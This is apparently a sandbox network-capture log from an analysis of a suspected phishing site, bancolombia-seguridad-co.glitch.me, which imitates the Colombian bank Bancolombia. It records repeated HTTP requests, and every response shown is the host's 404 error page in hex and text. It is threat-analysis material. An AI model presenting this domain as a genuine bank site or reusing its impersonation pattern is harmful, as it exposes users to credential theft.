                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:41.482705116 CEST419OUTGET /archivos/ingre.png HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.604130030 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.4497373.219.195.73802316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 13, 2024 18:20:40.277024984 CEST385OUTGET /hhhhhh_files/bact_listview.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.775767088 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.775790930 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.775805950 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.776104927 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:40.777323008 CEST377OUTGET /archivos/jquery-ui.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.910346031 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.910451889 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.910465002 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.910480976 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:41.529458046 CEST439OUTGET /css/font/CIBFontSans-Light.ttf HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          Origin: http://bancolombia-seguridad-co.glitch.me
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.css
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.656209946 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:41.656269073 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:41.656289101 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:41.656687021 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:46.759339094 CEST541OUTGET /favicon.ico HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _ga=GA1.3.306814812.1728836444; _gid=GA1.3.1344817587.1728836444; _gat_UA-597118-7=1; __qca=P0-1559252703-1728836443566
                                                                                                                          Oct 13, 2024 18:20:46.930362940 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:46 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:46.930418968 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.4497383.219.195.73802316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 13, 2024 18:20:40.277116060 CEST378OUTGET /hhhhhh_files/footer.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.763021946 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.763096094 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.763117075 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
